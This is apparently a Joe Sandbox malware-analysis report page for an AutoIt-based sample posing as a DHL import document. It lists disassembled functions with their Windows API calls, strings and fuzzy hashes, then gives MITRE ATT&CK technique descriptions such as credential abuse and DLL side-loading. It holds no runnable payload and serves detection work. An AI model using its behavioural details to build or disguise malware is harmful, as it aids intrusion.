Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 01dc50583324379e5eac280b2f8104c321cb90494180a82b6abeae164e686d3b
Instruction ID: 8963bde279404ec066f155118ce99b882ea64bcd06e6356f21d936ed05c9bc6c
Opcode Fuzzy Hash: 01dc50583324379e5eac280b2f8104c321cb90494180a82b6abeae164e686d3b
Instruction Fuzzy Hash: 62119D71100108AAEF158E64EC48AAB3F6AFB14378F508728FA68971D0C731EC91B750

Function 00546C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00546CB6
_wcslen.LIBCMT ref: 00546CC2

Strings

STOP, xrefs: 00546CBC, 00546CC1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: ab13f1cdd8b21ae9cfab3865fdc13fd40502f19b49a8ab1733d5bea17cf2bcd2
Instruction ID: 68b629e30e24da4d24459668aa9eaf16084897e423742b18fb9e5514307d77ed
Opcode Fuzzy Hash: ab13f1cdd8b21ae9cfab3865fdc13fd40502f19b49a8ab1733d5bea17cf2bcd2
Instruction Fuzzy Hash: F701C032A105278ACB20AFBEDC81AFF7BA5FF627187500929E86296194EB35DD40C651

Function 00541CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 00543CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00543CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00541D4C

Strings

ListBox, xrefs: 00541D16
ComboBox, xrefs: 00541CEB

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: d164c3b3418e34793f670813d54b0b47ea6366b0a4cfff7e47a5656a5b9520ff
Instruction ID: 999e3d9f15b4a40a2049eb765911f2526f8346cfbd97bb035a74ffffa0dfe269
Opcode Fuzzy Hash: d164c3b3418e34793f670813d54b0b47ea6366b0a4cfff7e47a5656a5b9520ff
Instruction Fuzzy Hash: 4C012871A00218AB8B14FFA5CC55DFE7B68FF42358B10090EF822572D1EA305D488664

Function 00541BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 00543CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00543CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00541C46

Strings

ListBox, xrefs: 00541C10
ComboBox, xrefs: 00541BE5

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9705cd8b085324bdec751abbe03ff17abefa692a63bd6d2e80f4283963c4e66c
Instruction ID: 68021a11849edb236c372186c728c7167d6cf28fd90d64b46045c9f29f987c79
Opcode Fuzzy Hash: 9705cd8b085324bdec751abbe03ff17abefa692a63bd6d2e80f4283963c4e66c
Instruction Fuzzy Hash: 1901F77168011866CB14FB91CD95EFF7BA8BF12384F10041EA806672D1FA249E4886B9

Function 00541C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 00543CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00543CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00541CC8

Strings

ListBox, xrefs: 00541C94
ComboBox, xrefs: 00541C69

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 75abea4246faf61f3f95abfe42b25c3d5a26027edf82e521eb4b0cfcfe9f895d
Instruction ID: 705013652afab7949935b6255961400a814c50737ba03dac2f3db8c3b586cadd
Opcode Fuzzy Hash: 75abea4246faf61f3f95abfe42b25c3d5a26027edf82e521eb4b0cfcfe9f895d
Instruction Fuzzy Hash: F701DB7168011867CB14F795CE86EFE7BA8BF11385F54041AB802772D1FA249F48D675

Function 004FA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004FA529

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Strings

3yS, xrefs: 004FA545, 004FA54D, 004FA552
,%[, xrefs: 004FA509

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%[$3yS
API String ID: 2551934079-2284930968
Opcode ID: 47f219381566b810a6ad50c92fcfa4ac80bb1ccecf06138c8e7e36add00e9b7f
Instruction ID: a989524ab419996a596561e90e5f2c0dc3fcf125c73051f1d840bf0c7f63ff92
Opcode Fuzzy Hash: 47f219381566b810a6ad50c92fcfa4ac80bb1ccecf06138c8e7e36add00e9b7f
Instruction Fuzzy Hash: 78017B31700219ABC914F769DC1BBBD3B54EB45710F50112EF6091B2C2EE18BD058A9F

Function 00541D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 00543CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00543CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00541DD3

Strings

ListBox, xrefs: 00541DA0
ComboBox, xrefs: 00541D75

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ef871b6533b9cf59b64c4238f810f439f821eb96d55e2c65c9f38d07990c1532
Instruction ID: b7458608bdda2d51d77b327e0bf52d81c7116c47043e10ceccbfe93301e83786
Opcode Fuzzy Hash: ef871b6533b9cf59b64c4238f810f439f821eb96d55e2c65c9f38d07990c1532
Instruction Fuzzy Hash: 08F0F4B1F5061866CB14F7A5CC96FFE7B78BF02388F440D1AB822672D1EA745D488268

Function 00578172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005B3018,005B305C), ref: 005781BF
CloseHandle.KERNEL32 ref: 005781D1

Strings

\0[, xrefs: 0057818A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0[
API String ID: 3712363035-3105402953
Opcode ID: 235c7ea9c201674b9fb65de274e607094bc97340e161743a4ea190a1731b5161
Instruction ID: 7d67d3e4a73affd3412fe8998eb8fc4de6fa54414195d980bff9caf6999a78e2
Opcode Fuzzy Hash: 235c7ea9c201674b9fb65de274e607094bc97340e161743a4ea190a1731b5161
Instruction Fuzzy Hash: 03F054B1640708BAE3507761AC4DFBB3E5CEF14750F004424BB0CE51A1D675BA44A3B4

Function 0056747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00567493
_wcslen.LIBCMT ref: 005674B9

Strings

3, 3, 16, 1, xrefs: 00567483

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 730b9750adc2e0d5287d28286bb49fa06ae090b47cc2215573ad6f135bf53380
Instruction ID: cac043ed080225202287267f6dc51bfff5434295c54c37bd75e14368ffcf1c3a
Opcode Fuzzy Hash: 730b9750adc2e0d5287d28286bb49fa06ae090b47cc2215573ad6f135bf53380
Instruction Fuzzy Hash: 48E02B5220532110D73112799CCDA7F5E89FFCDB517101C3BFE81C32A6EE948D9193A0

Function 00540B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00540B23

Strings

Error allocating memory., xrefs: 00540B1C
AutoIt, xrefs: 00540B17

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 293119f4c510f406c4f097fbec5c95d4931ffa01f47c416757971a451ef8bef9
Instruction ID: 5d323da9e83d5aa1777b75ca1988e6e6124af2b88f855816d898c92d5b4e643f
Opcode Fuzzy Hash: 293119f4c510f406c4f097fbec5c95d4931ffa01f47c416757971a451ef8bef9
Instruction Fuzzy Hash: 0FE0D8322443082BD21436557C03F9D7E88EF05B59F10442FF75C594C39AE1249456AD

Function 00500D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 004FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00500D71,?,?,?,004E100A), ref: 004FF7CE

IsDebuggerPresent.KERNEL32(?,?,?,004E100A), ref: 00500D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,004E100A), ref: 00500D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00500D7F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 12206c6be8122209421ed9095ba2353108f6d3dd1e54c39f02242b56271c6ccd
Instruction ID: 0f4b961899039b8fae82c7deda6e789f7a965ad733b087f97b54d54a4ef8e99b
Opcode Fuzzy Hash: 12206c6be8122209421ed9095ba2353108f6d3dd1e54c39f02242b56271c6ccd
Instruction Fuzzy Hash: 33E065742007414BD7609FB9F40434A7FE4BF10744F00892DE486C7691EBB4E488ABA1

Function 004FE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004FE3D5

Strings

0%[, xrefs: 004FE3B5
8%[, xrefs: 004FE3CA

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%[$8%[
API String ID: 1385522511-1020249257
Opcode ID: edd8d97e8563698c983f0b3c02438ce50a1a7c0558f9cfbba5a3e783298a233c
Instruction ID: 71f21de61823ea41868d3e22cb8e80e45c62c7287324d2d680c650caee4b4848
Opcode Fuzzy Hash: edd8d97e8563698c983f0b3c02438ce50a1a7c0558f9cfbba5a3e783298a233c
Instruction Fuzzy Hash: F2E02631400918CBC6349719F85DAEC3791FB44321F10126AEA038F2E19B387841A67E

Function 00553017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0055302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00553044

Strings

aut, xrefs: 00553038

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 725373088a4d8e4351ad178d7adc82f55c439165a5f5b088be6332388916f5fc
Instruction ID: 5a42130616cb017c628ab935c189ad2d35a1570f1adb6d31f1e11e8a76eb09ba
Opcode Fuzzy Hash: 725373088a4d8e4351ad178d7adc82f55c439165a5f5b088be6332388916f5fc
Instruction Fuzzy Hash: 00D05B7650031467DB209794AC0DFCB3E6CD705750F0001917695D2091DAB09A84DBD0

Function 0053D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0053D220

Strings

X64, xrefs: 0053D2A8
%.3d, xrefs: 0053D22B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: db65ac0119e85a678a5b97ed84374acd05e601e34fd8aabe41e3af1f78939eb5
Instruction ID: 581f1222eb9806ea634648d6d5cdb62272e1b52b7dda89b11421bce0d5413ad8
Opcode Fuzzy Hash: db65ac0119e85a678a5b97ed84374acd05e601e34fd8aabe41e3af1f78939eb5
Instruction Fuzzy Hash: 32D01269C0810CEACB9096D0EC458BBBB7CFB18301F608857F906D1041D638D558A771

Function 00572356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0057236C
PostMessageW.USER32(00000000), ref: 00572373

Part of subcall function 0054E97B: Sleep.KERNEL32 ref: 0054E9F3

Strings

Shell_TrayWnd, xrefs: 00572365

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 88532e1c7a4584356c453dea4aa89d3e97c4dd67bf289090f06eeb042c77cad4
Instruction ID: cb35ea3b657714e3ce6b06f2e5aa91f99a0c7e48776c5005c9f385d9dba91982
Opcode Fuzzy Hash: 88532e1c7a4584356c453dea4aa89d3e97c4dd67bf289090f06eeb042c77cad4
Instruction Fuzzy Hash: F1D0C932391310BAE664A770AC4FFCA6E14AB55B14F00491AB649AE1D0C9B0A8459A54

Function 00572322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0057232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0057233F

Part of subcall function 0054E97B: Sleep.KERNEL32 ref: 0054E9F3

Strings

Shell_TrayWnd, xrefs: 00572325

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 70035dbbd5f49dda750a37f54cbec35a455dfa194ba08c74b9cc78d433f4cbae
Instruction ID: 21631193c748cdd9d5b031efb22fd78ee9376b7d7dd611d0e4af322bef93dcb9
Opcode Fuzzy Hash: 70035dbbd5f49dda750a37f54cbec35a455dfa194ba08c74b9cc78d433f4cbae
Instruction Fuzzy Hash: 9FD01236394310B7E674B770EC4FFCA7E14BB51B14F00491AB749AE1D0C9F0A845DA54

Function 0051BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0051BE93
GetLastError.KERNEL32 ref: 0051BEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0051BEFC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b4c8d7afb5ea3cca2d6d0295f54b26aaca3b4f6217289976a5000d4ebe0f7568
Instruction ID: 34985fbed60e72441d8211ddcefb20291180ef9d17b881e06088fd53bd3965d6
Opcode Fuzzy Hash: b4c8d7afb5ea3cca2d6d0295f54b26aaca3b4f6217289976a5000d4ebe0f7568
Instruction Fuzzy Hash: 0E41B434604206AFFF218F65DC88AEA7FA9FF41320F244169F959971E1DB318D82DB60

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

